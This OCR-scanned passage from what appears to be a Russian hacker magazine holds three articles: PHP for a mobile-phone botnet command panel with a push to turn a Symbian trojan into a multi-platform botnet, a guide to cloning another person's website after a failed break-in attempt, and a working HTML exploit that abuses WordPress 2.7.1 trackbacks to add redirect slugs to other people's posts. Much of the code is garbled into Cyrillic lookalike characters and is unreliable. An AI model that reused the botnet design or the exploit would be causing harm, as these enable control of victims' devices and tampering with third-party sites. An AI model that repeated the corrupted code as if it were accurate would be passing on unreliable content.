для изменения алиаса и комментария. Выйдет 
примерно так: 

іипсііоп зАомЕотЪіез ( ) 

{ 

Сгу 

{ 

$с!ЬНапс11е = пеѵг ЗОЬіЦеБаСаЬазе 
( "тазіег-зегѵег . сЗЬ" ) ? 

іі ( зСгІеп ( $питЬег ) = = 0 ) 

$пишЬег= "ЖГШ " ; 

$зд1СеСѴіетл; = " ЗЕЬЕСТ * РКОМ зотЬіез"; 

$гези1С = $с!ЬНапс11е->диегу ( $зд1СеСѴіеѵО ; 

есЬо ' <СаЫе Ьогсіег= " 1 " місІЦ]т="100%" 

Ъ.еідІЩ = " 100% " > ' ; 



есііо ' <Сг Ьдсо1ог=" ' . ($радеѴіе 
ѵі [ 4 ] ? ' дгееп ' : ' гесі ' ) . ' " хСсІхіпри 
С Суре= "ЬиССоп" ѵа1ие=сСпец. команда" 
опс1іск= " э аѵазсгірС : ореп2отЬіе ( ' . $рад 
еѴіем [ 0 ] . ' ) " /х/Ссіх1і(і> ' . $радеѴіеѵ^ [ 0 ] . 

' </СсіхС(і> ' . $радеѴіеѵ^ [ 1 ] . '</ 

Сс1хСс1> ' . $радеѴіем [2 ] . ' </Сс1хСс1> 1 . 
$радеѴіе^[3] . ' </Д<5х1:с5> ' . $радеѴіем [4 ] . '</ 
СсіхСсіхсііѵ ісЗ.= " скапдеАІіаз ' . $радеѴіем [ 0 ] 

. 1 " зСу1е=»с1ізр1ау : попе; "хіогт асбіоп=" " 
теЫтосі= " РОЗТ" хіприб буре= "Аісісіеп" 
ѵа1ие= " ' . $радеѴіем [ 0 ] . ' " паше= " ісі" /хіприб 
буре= " бехб " ѵа1ие=" 1 . $радеѴіем [ 5 ] . 1 " 
пате= " аііаз " /хіприб буре= " зиЬтіб " 
ѵа1ие= "Изменить " ></ богшх/<5іѵ>«3.іѵ ісі= " 
зіюѵ/АІіаз ' . $радеѴіеѵ7 [ 0 . $радеѴіеѵ\7- [ 

5 ] . ' — <а Иге 6= " з аѵазсгірб : сЬапдеАІіаз ( ' 

. $радеѴіем [ 0 ] . ' ) ; " >Изменить</ах/сЗіѵ></ 
СсІхЦсіхсііѵ ісІ= " сИапдеСошшепб ' . $радеѴіем [ 0 
] . ' * збу1е= " сіізріау : попе ; " хбогш асбіоп= " " 
шеб1іо(і= " РОЗТ" хіприб буре= "Ьісісіеп" 
ѵа1ие= " ' . $радеѴіем [ 0 ] . ' " паше= " ісі" /хіприб 
буре="бехб" ѵа1ие=" 1 . $радеѴіем [ 6 ] . 1 " 
паше= " сошшепб " /хіприб буре= " зиЬгпіб " 
ѵа1ие= "Изменить " х/ богшх/сііѵхсііѵ іс!= " зРюм 
Сошшепбс . $радеѴіем [ 0 . $радеѴіем [ 6 ] . ' — 
<а Ьгеб= " з аѵазсгірб : сИапдеСотшепб ( ' . $радеѴі 
еѵі [ 0 ] . 1 ) ; " >Изменить</ах/с1іѵх/бс1х/бг> ' ; 

$радеѴіеѵ^ = $гези1б->бебс]т ( ) ; 



} 

есііо с</баЫе>' ; 



} 



саісіі( Ехсербіоп $ехсербіоп 

{ 



ПНТТР://ѴШѴѴ 

■ I 

> Ііпкз 

• — 

сайт СУБД ВОЫіе. 
Прекрасно подходит 
для легких проектов 
и встраиваемых 
решений. 

• охоб.ги — мой блог. 
Пишу по мере жела- 
ния. Жду коммента- 
риев, отвечу 
на вопросы. 




> іпіо 

В мартовском номере 
~і~ была опубликована 
статья по созданию 
Трояна для ВутЬіап. 
Нетрудно доработать 
его и научить общать- 
ся с нашим мастер- 
сервером. Может 
получиться прекрас- 
ный мульти-платфор- 
менный ботнет. 



есііо ' <бгхбсіх/бсіхб(і>ІВ</б(іхб(і>ІМЕІ</ 
Дсіхѣ(і>Рііопе пишЬег</бсіхб(і>Іпбесбесі БаДес/ 
бсіхбсі>Ьазб АсДіѵе Бабе</бсіхбсі>АІіаз</ 
бсіхбсі>Сошшепб</б(іх/бг> ' ; 

есііо ' <зсгірД 1апдиаде= " ИаѵаЗсгірб " > 
іипсДіоп сііапдеАІіаз (ісі) { 
сіосишепб . деДЕІетепДВуІсІ 

( " сііапдеАІіаз " + ісі) . зіуіе . с!ізр1ау= " " ; 
сіосишепб . деДЕІетепДВуІсі 

( " зііомАІіаз " +ісі) . зіуіе . сіізр1ау= "попе " ; 

} 

іипсДіоп сИапдеСошшепб (ісі) { 
сіосишепб . деДЕІетепДВуІсі 

( " сИапдеСошшепб " +ісі) . зДуІе . сіізр1ау= " " ; 
сІоситепД . деДЕІетепДВуІсі 

( " зТю^Сошшепб " + ісі) . збуіе . сіізріау = "попе" ; 

} 

іипсДіоп орепЕошЬіе (ісі) { 
тпскж. ІосаДіоп . іігеб= " зогпЬіе . ріір?ісі= " + ісі; 

} 

</зсгірб> ' ; 

$радеѴіем = $гезиІЦ->іеі:сіі ( ) ; 
отііііе ($радеѴіеѵ?) 



сііе ( $ехсерДіоп->деДМеззаде ( ) ) ; 

} 

} 

После этого напишем еще два скрипта для отображения 
и редактирования бродкасти специальной команды вы- 
бранному устройству. Исходники их функций я приводить 
не буду, они аналогичны уже разобранным и не нуждаются 
в комментариях. На дискеты найдешь полные исходники 
приложения, без труда разберешься и допишешь нужный 
функционал, если потребуется. Моетворениеты можешь 
наблюдать на скриншотах. Еще раз отмечу, что специ- 
ально делаю код понятным и простым, а не быстрым и 
безопасным. 

н ЗАКЛЮЧЕНИЕ 

Миф о несуществовании телефонных ботнетов разве- 
ян. Как минимум, три тестовых образца выполняли мои 
команды, а это уже ботнет :). Есть надежда, что в скором 
времени процессоры мобильников станут еще быстрее, 
памяти будет больше, а кнопок не останется вовсе. Так 
или иначе, уровень безопасности телефонов неизбеж- 
но возрастет. Гипервизоры и подписанный код станут 
основополагающими требованиями. Очень надеюсь, что 
наряду с этим вы растут уровень и количество специалис- 
тов, которые будут в состоянии вскрывать такие защиты. 
Как всегда, на все вопросы отвечаю в блоге ИирТ/охоб. 
ги. Уда ч и ! 




> СІѴСІ 



Рабочую версию 
скриптов и библи- 
отеки для работы 
с БОБііе из РНРты 
найдешь на диске. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 
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Методика полного копирования сайта 



Сейчас стало модным делать сайт и называть его словом «стартап». 
Этим занимаются все, кому нелень. Ну, мытожежить не можем без 
своего стартапа. Но ведь самим писать — не наш метод. Лучше возь- 
мем сайт соседа и полностью, со всей функциональностью, скопиру- 
ем. А потом внизу смело подпишемся своим именем. 



Как-то вечером, перебирая клейкие листоч- 
ки на сайте гарізосбкі.ги . я поймал себя на 
мысли, что владелец сервиса может, в теории, 
читать все, о чем я написал... И главный вопрос 
даже не во владельце — ведь мои любимые 
спецслужбы также могут это делать! Отказы- 
ваться отсервиса я не планировал, в связи с 
его качеством и полезностью, поэтому решил 
взломать сервер, скопировать все исходники и 
установить их себе. Сказано — сделано. Сразу 
в бой за доступ вступили разные приемы про- 
верки на инъекции, инклуды, простые пароли 
и прочее. Эта идея с грохотом провалилась, 
правда, взамен родилась новая, которая просто 
не могла не реализоваться. Но — прервемся 
немного и посмотрим, что собой представляет 
сайт гарізосбкі.ги . 

в ЗАПИСОЧКИ 

Сервис онлайн-записочек очень прост, и 
эта простота дьявольски притягивает. После 
захода на сайт весь экран браузера становится 



пустым. Если нажать на любом месте, то поя- 
вится «клейкий листочек» — некий квадратик, 
в котором можно писать текст и затем его 
редактировать. Также, в углу есть маленький 
квадратик, нажимая на который можно менять 
цветлисточка. И есть крестик, которым удаля- 
ется записочка. Весь интерфейс выполнен с 
использованием АЭАХ, и страница при работе 
не перегружается. Рабочая поверхность, на 
которой находятся записочки, называется «до- 
ска» (ЬоагсІ] и имеетуникальный идентифика- 
тор, что отображается в ІЭРІ_. Эту информацию 
я рассказал, потому что без нее сложно понять 
статью. Оптимальным вариантом будет, если 
перед прочтением следующихабзацевты зай- 
дешь на сайт и сам испробуешь функционал. 

в ВОЗРОЖДЕНИЕ 
СТАРОЙ МЕТОДИКИ 

Вернемся к рассмотрению мега-старой ме- 
тодики, которая сейчас снова возрождается. 
Раньше все сайты были статическими — со- 



стояли из НТМІ_-файлов и картинок. Этодобро 
отдавалось браузеру полностью для отобра- 
жения. Чтобы скопировать сайте потрохами, 
нужно было лишь запустить программу, которая 
открывает все ссылки на сайте и сохраняет все, 
что отдает сервер. Но затем в мир Веба пришла 
динамика, и копирование сайта стало задачей 
чрезвычайно трудной. К примеру, форум с со- 
общениями. Даже если по нему пройдется бот 
и сохранит все страницы, — это ничего не даст. 
Практически весь функционал заброшен в 
скрипты, которые остаются для нас закрытыми. 
При этом, тенденции к упрощению функциона- 
ла не наблюдается и, казалось бы, скопировать 
сайт стало невозможно. Нотут пришла эра Веб 
2.0! Одним из ее аспектов является перенос 
большой части функционала с серверного 
уровня на браузерный, на ЭаѵаВсгірІ:.., — а ведь 
он отдается нам в открытом виде! Чем больше 
система будет работать на стороне браузера, 
тем меньше кода на сервере — то есть, скры- 
того от нас кода. Этот маленький участок кода, 
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который можно и самому дописать, — мелочь 
по сравнению стой частью, что мы без проблем 
скопируем. Теория может показаться немного 
непонятной, но после практики все встанет на 
свои места. 

Итак, в качестве примера мной был выбран 
сайт гарізосбкі.ги . Много функциональности 
в нем находится на стороне ^ѵаЗсгірТ а на 
стороне сервера лишь выполняются несколь- 
ко запросов по сохранению, обновлению и 
удалению клейких листочков. Если попытаться 
эмулировать эти запросы, то можно полностью 
скачать с сайта все остальное. Правда, сначала 
нужно понять, как работает приложение, 
какими командами обменивается серверная 
и клиентская часть, как генерируется первая 
страница ит.п. Пошагово пройдемся по всему 
процессу полного клонирования. 

в ИНСТРУМЕНТЫ 

Чтобы разобраться с работой сайта, вос- 
пользуемся РігеРох с установленными тремя 
плагинами: 

• Тетрег Баба (ІШбрз : / /аббопз . 
тог і 11а . огд/еп-ТТЗ/ іігеіох/ 
ас1с1оп/966) для просмотра, перехвата 
и изменения запросов; 

• ѴГеЬ Беѵеіорег (йббрз : / /асісіопз . 
шогіііа . огд/еп-ІІЗ/ іігеіох/ 
аскіоп/60) для отключения кеша бра- 
узера, для просмотра и удаления 
кукисов ; 

• РігеВид (йббрз : //аббопз .шогіііа. 
огд/еп-иЗ/іігеіох/а(і(1оп/1843 ) для 



отладки ЦаѵаЗсгірЦ и анализа запро- 
сов . 

Также необходим Оіііі пе Вгоѵѵзегдля скачи- 
вания всего сайта (триальная версия есть на 

ѵѵѵѵѵѵ.теІаргосІисІз.сопп/тр/РогІаЫе СМіпе 
Вгоѵузег.Ьіт или у нас на диске]. 

в ЭТАПЫ КОПИРОВАНИЯ 

Копирование сайта «Записочки» состоит со 
следующих этапов: 

• Анализ и эмуляция идентификации; 

• Копирование страницы с записочка- 
ми; 

• Анализ протокола обмена клиентской 
части с серверной; 

• Анализ генерации главной страницы; 

• Программинг серверной части . 

В результате мы получим полностью рабочий 
сайтгарізосбкі.ги у себя на локальном сервере. 

в АНАЛИЗ 
ИДЕНТИФИКАЦИИ 

Перед копированием разберемся с идентифи- 
кацией юзера, ведьу каждого своя страница с 
клейкими листочками, и нужно знать, какому 
юзеру какие записочки отображать. Перед 
началом анализа я, с помощью плагина ѴѴеЬ 
Оеѵеіорег, удалил все кукисы для чистоты экс- 
перимента. Включив Тетрег Оаіа, я загрузил 
гарізосбкі.ги . — на что сервер вернул код пере- 
адресации 302 на 2 арізосбкі.ги/много_цифр/, 
да и еще бросил кукисы с каким-то логином и 



паролем. Я попробовал удалить пришедшие 
кукисы и загрузил 2 арізосбкі.ги/много_цифр/. 
Даже без логина и пароля, что были в кукисах, 
страничка нормально отобразилась. Делаем 
вывод, что идентификация происходит именно 
поэтих циферкам в И К Р, а логин и парольтре- 
буются л ишь для внутренних нужд сайта. 
Теперь можно копировать сайт и реализовать 
идентификацию. Для этого я быстро создал на 
Денвере хосте многозначительным назва- 
нием « 2 ». Для эмуляции главной странички 
— набросал скрипт, который при заходе на сайт 
«7.» будет проверять кукисы. Если они есть, то, 
исходя из них, юзер будет переброшен на ту 
доску, которая прописана у него в кукисах. 
Таким образом, если в оригинале в кукисах 
хранятся логин и пароль, по которым уже 
показываются записочки, то мы немного все 
упростим и будем хранить идентификатор 
доски. Записочки будут привязаны кэтому 
идентификатору. Да, это не совсем правиль- 
но со стороны безопасности, но нам главное 
получить рабочий сайт, а доводкой уже можно 
заниматься потом. 

Итак, мы можем написать маленький скрипт, 
который будет эмулировать идентификацию, 
какуказано выше. Этим скриптом мы эму- 
лировали функциональность, связанную с 
идентификацией. Пора приступить к следую- 
щему этапу. 

в ОРРЫЫЕЕХРЮРЕР 
В РАБОТЕ 

Рассмотрим копирование функциональ- 
ности самих листочков. Перейдем на сайт 
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— 1 — Г~ 

> Ііпкз 

• Адрес нашего 

ПОДОПЫТНОГО: 

гарізосЬкі.ги . 

• Все дополнения 
к РігеРох:_ 
асІсІопБ.тогіЦа.огд 



гарізосбкі.ги/ много цифр , создадим несколько разных 
записок и попробуем скопировать РІТМІ_-страницу со всей 
обвязкой. Конечно, можно все это и вручную проделать, — 
смотреть, какие файлы загружаются вместе со странич- 
кой, и потом их копировать по одному — но лучше восполь- 
зоваться инструментом для создания фейков, а именно 
(Жіпе Вгоѵѵзег. Запустим его и в качестве исходного ІІРР 
зададим гарізосбкі.ги/много циф: . Пара кликов на ІЧехІ 
— и сайт полностью сохранен. После этого воспользуемся 
функцией экспорта и сохраним результат. В каталоге экс- 
порта появилась папка с названием гарізосбкі.ги, а в ней, 
в папке Ібетез, — все нужные картинки, скрипты и пр. 
Также там есть папка «много_цифр», а в ней один файл и к 
с названием беІаиІТ.Ыт. 

Далее я скопировал в Денвер папки Ібетез и «много_ 
цифр», а беІаии.Ыт переименовал на іпбех.рбр. Если зайти 
в браузере на би р Т/г/много буковок , то отобразится стра- 
ничка с нашими закладками, правда, не все пока работает. 
Почему-то не двигаются закладки. Сейчас исправим... 

в РІВЕВІІС Ѵ5. ОРРиЫЕ ЕХРЮВЕВ 

Откроем наш РігеВид и активируем весь функционал, на- 
пример, нажав на вкладке «ІЧеІ». Поставим везде галочки 
и нажмем «Применить». Теперь, когда перейдем на вкладку 
«СопзоІе»,там пишется что-то типа «ошибка с сігадсігор». 

Тут нужно отлаживать ТаѵаЗсгірІ, смотреть, в чем проблема, 
но я воспользовался другой методикой, и она сработала! Я 
открыл скачанный сЫаиИ.Ыт и в поиске ввел «сігадсігор» — 
курсор переместился на строчку: 



<ЗСГІрЦ 

згс=" . . /зсгірСасиІоиз . з з@ 

1 оасі=е^ЕесЦз , сігадсігор " 

Суре= " СехС/з аѵазсгірС " ></зсгірС> 

Сразу в глаза бросается, что после зсгіріасиіоиздз идет 
«0», хотя в теории должен быть«?» (это же Сеі-запрос]. 
Понятно, что так сделал ОІШпе Вгоѵѵзег, чтобы превратить 
динамически сайт в статический, но нам оно не нужно. 
Поэтому возвращаем все назад и заменяем «Й» на «?», а 
файл зсгіріасиіоиздзйіюаскеііесіз.сігадсігор переименуем в 
изначальный — зсгіріасиіоиздз. После этого мы увидим, что 
во вкладе N еі: в РігеВид появились две ошибки номер 404, 
то есть, двух файлов не было обнаружено, а именно: 

е^ЕесСз . з з 
сігадсігор . з з 

Достать их не проблема! Смотрим в РігеВид пути, загружаем 
с сервера записочек и сохраняем костальным скриптам. 
Обновимся и увидим, что все отобразилось, ошибок нет, да 
и ктомуже, все функции сзаписочками стали нормально 
работать. Один из этапов выполнен. 

в УДАЛЕНИЕЛИШНЕГО 

Красоту немного портит «разьехавшийся» дизайн — 
будем исправлять! Если нажать на «инспектора» в 
РігеВид и навести на наше меню, то увидим, что это 
все одна таблица. Нам ее не жалко, заходим в исход- 
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МѴ5СИ.РВ0ІЧТ — УДОБНЕЙШЕЕ 
СРЕДСТВО ДЛЯ РАБОТЫ С БАЗОЙ 



Это важно, ведь потом данную строчку будет 
генерировать скрипт. Также видим, что ісі 
передается пустым, а в результате сервер 
возвращаетчисло. Если изменить какой-то 
параметр записочки (цвет, расположения или 
текст], то посылается такой же запрос, только 
ісі становится не пустым. Из этого можно 
сделать вывод, что, если ісі пустое, то сервер 
создает в базе новую запись о записочке и 
возвращает клиенту ее идентификатор. В 
противном случае изменяются в базе пара- 
метры той записочки, идентификатор которой 
передается. Посмотрев на беІаиІЕЫт, видим 
строку: 



прорисовке берет на себя ЭаѵаЗсгірІ. Но 
первый раз страницу нужно генерировать. 
А именно — вверху, в переменную Ьоагб, 
вписать тот идентификатор, по которому 
пришел юзер. 

в ФОРМИРОВАНИЕ 
ЗАПИСОЧЕК 

Если посмотреть в конец исходника беіаиіі 
Ыт, то можно увидеть следующее: 

сЕогт ісі= " зСіскегз " > 
сСехСагеа Іс3= " зЗ 6734 " 
зСу1е= " ІеіС : бірх; Сор : 32рх; 2 - 



іпсіех : 1 " > 



ник страницы и удаляем все между тегами 
<{аЫе>, да и сами теги также. После обнов- 
ления наблюдаем идеальный минималист- 
ский дизайн. 

Но в «Сопзоіе» ЕігеВид опять появились ошиб- 
ки. На этот раз — в файле збскещз. Также там 
возле ошибки указывается номер проблемной 
строки. Если перейти на нее, а потом удалить 
строку, то после обновления ошибки больше не 
будет. В от та к, иногда удаление бывает эффек- 
тивнее создания. 

в ПРОТОКОЛ ОБМЕНА 



ѵаг заѵеІШЬ = ' . . /поЬеЪоагсі/заѵе/ ' ; 

- она определяет путь к файлу, что обрабатыва- 
ет сохранение, но мы его изменим на: 

ѵаг заѵеІШЬ = ' . . /заѵе.рЪр' ; 

Написанием этого файла займемся позже. 
Теперь рассмотрим удаление. Если нажать на 
крестик, то в ЕігеВид появитсятакой запрос: 

Р08Т /ЫоЬеВоагсІ/сІеІеЬе/37094 



текст записочки 1</ЬехЬагеа> 
сЬехЬагеа іс!=" з36735" 
зЬу1е= " ІеіЬ : 90рх; Сор : ЗЗрх; 2 - 
іпсіех : 0 " > 

текст записочки 2</ЬехЬагеа> 
</:Еогт> 

Нам нужно взять из базы «записочки»данные 
и потом их выводить какіюхфгеа, где в стиле 
прописывать позицию в параметры ІеіТ и Тор, 
в 2 -іпбех писать цвет, а в ісі — идентификатор 
записочки. Также междутегами <{ех1:агеа> надо 
вписать текст. 



Записочки двигаются, текст и цвет меняется, 
однако, все это не сохраняется. Давай разбе- 
ремся в протоколе обмена, чтобы в будущем 
его эмулировать. Откроем наши записочки в 
ЕігеВид с вкладкой Сопзоіе. Будем пробовать 
записочки в действии. Нажмем на пустом месте 
— появляется пустая записка. Теперь введем 
любой текст и выставим цвет. Видим, что брау- 
зер послал запрос: 

РозЬ 

Ъоагсі : 7 0 012 8 6217 51072 4517162 55856 

15874 

соіог: 1 

ісі: 

ЬехЬ : зотеЬехЬ 
х: 123.1 
у: 543.2 

Причем, переменная Ьоагб берется с начала 
нашего файла беІаиІі.Ыт, где есть строчка: 

ѵаг Ъоагсі = '7001286217510724517162 
5585615874 ' ; 



Видим, что при удалении в запросе указывает- 
ся ісі записочки. ИРЕ, по которому будет отослан 
запрос, также, каки для сохранения хранится в 

беІаиІЕЫт : 

ѵаг сіеІеЬеІШЬ = ' . . /поЬеЪоагсі/ 
ЪеІеЬе/ ' ; 

Хотя это несколько неудобно, ведь нужно 
настраивать .Ыассезздлятакихзапросов. Поэ- 
томуупростим алгоритм, изменив УЕБ на: 

ѵаг ЪеІеСеІЖЬ = ' . . /ЪеІеЬе . рЪр? ' ; 

С этого времени запросы всегда будут об- 
ращаться на файл беІеіе.рЬр, а ісі листочка 
-приходить какОЕТ-параметр. 

Мы знаем протокол обмена между сер- 
вером и клиентом и уже можем написать 
сценарии заѵе.рбр и беіеіе.рбр, но оста- 
вим программерскую часть на потом. Ведь 
у нас осталась еще генерация первой 
страницы. То есть, когда уже страни- 
ца загрузилась, дальше всю работу по 



в ПРОГРАММИРОВАНИЕ 

Теперь мы знаем, какгенерировать первую 
страницу, как обрабатывать АЗАХ-запросы 
от ЗаѵаЗсгірі и можем начать последний этап 
— программирование. В качестве языка был 
выбран РНР. 

Нам требуется сделать четыре файла: .Ыассезз, 
іпбех.рЬр, заѵе.рбр, беІеіе.рЬр. В .Ыассезз 
пропишем правила перенаправления всех 
несуществующих каталогов к іпбех.рбр (это 
нужно, чтобы перехватить запросы на адреса со 
многими циферками]. 

Файл .Ыассезз будет следующим: 

КешгіЬеЕпдіпе оп 

КемгіЬеСопсІ % {КЕдЬЕ8Т_ЕІЬЕЫАМЕ} 1-і 
КеѵггіѣеСопсІ % {КЕдЬЕ8Т_ЕІЬЕЫАМЕ} ! -Ъ 
КетлпгіЬеКиІе А (.*)$ іпсіех . рЪр?$1 
[Ь,03А] 

Подумаем над проблемой хранения информа- 
ции. Создадим в МуЗОБ базу данных с одной 
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простой таблицей и следующими полями, выбранными 
исходя из параметров записочки: 

ісі — іпЪедег, для хранения идентификатора за- 
писочки 

Ъоагсі — ЬідіпР , для хранения доски, в которой 

находится записочка 

соіог — Ріпуіпі: , для хранения цвета 

х — ЁІоаЪ, для хранения х-координаты 

у — ЁІоаЪ, для хранения у-координаты 

ЬехР — ѵагсЬаг (255) , для хранения текста 

Файл заѵе.рбр очень простой. Он лишь должен уметь прини- 
мать Розі-данные и генерировать запрос на создание новой 
записочки: 

ШЗЕКТ ШТО 2 ЗЕТ ' Ъоагсі ' = ' $Ъоагс1 ' , 

' СехС ' = ' $СехС ' , ' х ' = ' $х ' , ' у ' = ' $у ' , 

' СОІОГ ' = ' $СОІОГ * 

— или запрос для обновления уже существующей: 

ІІРБАТЕ 2 ЗЕТ 1 Ъоагсі ' = ' $ЪоагЪ ' , ' РехР 1 = 1 $РехР 1 , 
' X ' = ' $х ' , ' у ' = ' $у ' , ' СОІОГ ' = ' $СОІОГ ' ѴШЕЕЕ 

' ісі ' = ' $ІЪ ' 



Ну а беІеІе.рЬр будет не сложнее: 

БЕЬЕТЕ ЕКОМ 2 ШЕКЕ ІЪ= ' $ісГ АББ 
ЪоагЪ= ' $ЪоагЪ ' 

Файл іпбех.рЬр, как мы уже обсуждали, нужен для переад- 
ресации юзера по его кукисам на необходимую страничку. 
То есть, он будет «брать» идентификатор доски іб, кото- 
рый хранится в кукисах, и выбирать с базы все соответс- 
твующие записочки, а дальше вы водить тот файл, что мы 
получили от СЖіпе Вгоѵѵзег, и в нем междутегами <іюгт> 
помещать записочки в формате, который мы определили 
выше. 

в ВСЕУНАШИХНОГ 

На создание сайта у автора ушел, как минимум, ме- 
сяц, а мы его скопировали за час. 

И таких сайтов сейчасочень много, та к что простор 
для творчества огромен, главное не лениться. 
Позволю себе напомнить, что вся информация 
представлена лишь для ознакомления. Если у тебя 
вдруг возникнут какие-нибудь вопросы, то мои ко- 
ординаты ты сможешь найти на моем сайте 
ЬирУЛиіатс.согп. 

Всегда с радостью отвечу и помогу, ц-ц 
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ѴѴ0К0РКЕ55 
ИЛИ 



ВАГОН 

ОйАУ УЯЗВИМОСТЕЙ 



ПРОДОЛЖАЕМ ХАК 



популярнейшего движка 



Рамки предыдущей статьи не позволили мне рассказать о еще не- 
скольких интереснейших неопубликованныхуязвимостях и баналь- 
ных недоработкахѴѴогсІРгезз.Такчто, сейчасты сможешь прочитать 
продолжение репеіхабоп-теста известнейшей блоговой платформы. 
Итак, поехали! 



» в СТАТИСТИКА 

| Для начала я хочу привести некоторые статис- 
^ тические данные из исследования, которое 
й было проведено мной в середине января сего 
года. 

Из выдачи горячо любимого всеми Гугла было 
случайным образом взято 33534 уникальных 
блога, работающих на ѴѴогсІРгезз, которые 
затем были распарсены в попытке определить 
их версию. Вот что из этого получилось: 



1.5. x — 207 блогов (0.6%) 

2.0. x- 1624 блога (4.8%) 

2 .1. x - 1219 блогов (3.6%) 

2 .2 .х - 2175 блогов (6.4%) 
2.3.x- 4366 блогов (13%) 

2.5. x - 4343 блога (12.9%) 

2 . 6 . х — 8715 блогов (25.9%) 

2 . 7 . х — 5986 блогов (17.8%) 
Ипкпоѵт — 4899 блогов (14.6%) 



Можно понять, что наиболее популярными и 
представляющими для насстобой интерес 
ветками являются 2.3.x, 2.5.x, 2.6.x, 2.7.x 
(2.4.x разработчики пропустили по опре- 
деленным причинам). В то же время в этих 
ветках найдено и опубликовано очень малое 
количество уязвимостей (напомню, что 
последняя зрі-инъекция была в паблике в 
2.2.2 версии). 
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АДМИНКА ѴѴ0К0РКЕ55 2.7.1 





зіидз) ) 

аск!_розБ_теБа ( $розБ_ісІ, 

' _длгр_о1с1_з1ид ' , 

$_Р03Т [ 'тлр-оісі-зіид ' ] ) ; 



} 

6. И, собственно, зачем весь этот код нам был 
нужен, ./ѵѵр-іпсІисіезЛіиегу.рЬр: 

БипсБіоп мр_о1с!_з1ид_гес1ігесБ () 

{ 



$диегу = "ЗЕБЕСТ розБ_іс! ЕЕОМ 
$ѵфс!Ъ->розБтеБа , $ѵфс!Ъ->розБз ШЕЕЕ 
ІБ = розБ_іс! АЫБ теБа_кеу = ’_ѵф_о1(І_ 
зіид' АББ теБа_ѵа1ие= 1 " . $ѵф_диегу- 
>диегу_ѵагз [ ' паше ' ] . " 1 " ; 



В первой части статьи я постарался исправить 
недоразумение, но, какты уже понял, это были 
далеко не последние приватныеуязвимости 
вордпресса... 

в ШУТКА ЮМОРА 

Представь, что на нужном нам блоге при- 
сутствует пост с адресом ЫТрУЛатег/ 
ѵѵр233/2009/03/20/ЬеЦо-ѵѵог[б . Ты хочешь 
насолить/подшутить над админом и сделать 
так, чтобы этот пост имел еще и адрес вроде 
Ьир://[атег/ѵѵр233/2009/03/20ЛЫ5-І5-а- 
зискег-розБ 

Разработчики вордпресса с радостью предо- 
ставляюттебетакую возможность! Но что это: 
багилифича — я незнаю :). 

Для начала детально разберем механизм 
постинга комментария в последней на момент 
написания статьи версии 2.7.1 . 

1 . Файл ик ѵѵр-соттепІз-розІ.рЬр (а 
также ѵѵр-Ігаскбаск.рЬр], через который 
проходят все комментарии имеет в себе 
следующий КОД: 

$соттепБ<іаБа = сотрасБ ( ' соттепБ_ 
розБ_ІБ 1 , ' соттепБ_аиБ1юг ' , 

' соттепБ_аиБІюг_етаі1 ' , ' соттепБ_ 
аиБІюг_иг1 ' , ' соттепБ_сопБепБ ' , 

' соттепБ_Буре ' , ' соттепБ_рагепБ 1 , 

' изег_ІБ * ) ; 

$соттепБ_іс1 = ѵф_пем_соттепБ ( 
$соттепБс!аБа ) ; 

2. Эту функцию мы можем легко отыскать в ./ 
ѵѵр-іпсІибез/соттепТрбр: 

БипсБіоп ѵф_пем_соттепБ 
( $соттепБс!аБа) 

{ 

$соттепБ_ІБ = 

ѵгр_іпзегБ_сошшепБ ( $соттепБс1аБа) ; 

} 

3. Там же проводим небольшой реверси нг: 



БипсБіоп ѵ\гр_іпзегБ_ 
соттепБ ( $соттепБс1аБа) 

{ 

ІБ ( $соттепБ_арргоѵес1 == 1) 
ѵтр_ир сіа Б е_с оішпепБ _с оипБ 
( $соттепБ_розБ_ІБ) ; 

геБигп $і<5; 

} 

БипсБіоп ѵ\щ>_ирс1аБе_соттепБ_соипБ 
($розБ_ісІ, $с!о_с1еБеггес1=Ба1зе) 

{ 

еІзеіБ ( $розБ_іс! ) { 
геБигп ѵф_ирс!аБе_соттепБ_соипБ_ 
почл ( $розБ_іс!) ; 

} 

} 

БипсБіоп ѵф_ир<іаБе_соттепБ_соипБ_ 
пом ( $розБ_іс!) 

{ 

<То_асБіоп ( ' ес!іБ_розБ ' , $розБ_ісі / 
$розБ) ; 
геБигп Бгие; 

} 

4. Асбоп есІі{_ро5і: определен в .Дл/р-іпсіисіез/ 
(МаиІі-бІіегз.рЬр: 

асМ_асБіоп ( ' ес!іБ_розБ ' , 

' мр_сЬеск_Бог_с1іапдес1_з1идз ' ) ; 

5. Находим нужную нам функцию в ,/ѵѵ р- 
іпсІибез/розТрбр: 

БипсБіоп мр_сЬеск_Бог_с1іапдес1_ 
зіидз ( $розБ_іс!) { 

ІБ ( ! іззеБ ( $_РОЗТ [ ' мр-оісі-зіид ' ] ) 
И ! зБгіеп ( $_РОЗТ [ 1 мр-оісі-зіид ' ] ) ) 

// ІБ ме каѵеп'Б асісіесі Йііз оісі зіид 
ЪеБоге, асісі ІБ пом 
ІБ ( ! соипБ ( $о1(1_з1идз) I I ! іп_ 
аггау ( $_РОЗТ [ ' мр-оісі-зіид ' ] , $о1с!_ 



мр_гес!ігесБ ( $1іпк, '301'); 

/ / РегшапепБ гесІігесБ 
ехіБ ; 
епсіі Б ; 

} 

Из анализа вышеприведенного кода следует 
вывод: если в БД для определенного поста 
при сутствует значение «_ѵѵр_о Ш_з Іи д », то 
по нему проводится редирект на настоящий 
адрес поста. Чтобы добавитьэто значение, 
твой комментарий должен бытьзааппрувлен. 
Как оставлять комментарии без проверки 
модератора, ты уже знаешь по первой части 
статьи :). Теперь, наконец-то, готовый эксплойт 
для нашей шутки: 

<ЬБш1> 

<Богш асБіоп= "кББр : / /Іашег . сот/ 
мр/мр-БгаскЪаск.рЬр?р= [ІБ_ПОСТА] " 
теБіюс1= "розБ " > 

Тайтл: <іприБ паше= " БіБІе " 
ѵа1ие="соттепБег" /><Ьг/> 

ІШБ:<іприБ пате="иг1" 
ѵа1ие="ЬББр : //%/1а. сот" /><Ьг/> 
СоттепБ : <іприБ пате= " ехсегрБ " 
ѵа1ие= " " /><Ьг/> 

31ид:<іприБ пате= "мр-оісі-зіид" 
ѵа1ие=" " /><Ьг/> 

<іприБ пате= "Ыод_пате " 
ѵа1ие=" Віод" /><Ъг/> 

<іприБ Буре= " зиЬтіБ " ѵа1ие= " ок" /> 
</Богт> 

</кБт1> 

В поле «51ид» вставляй новое имя для под- 
ходящего поста и показывай ссылку админу, 
наблюдая за его реакцией. 

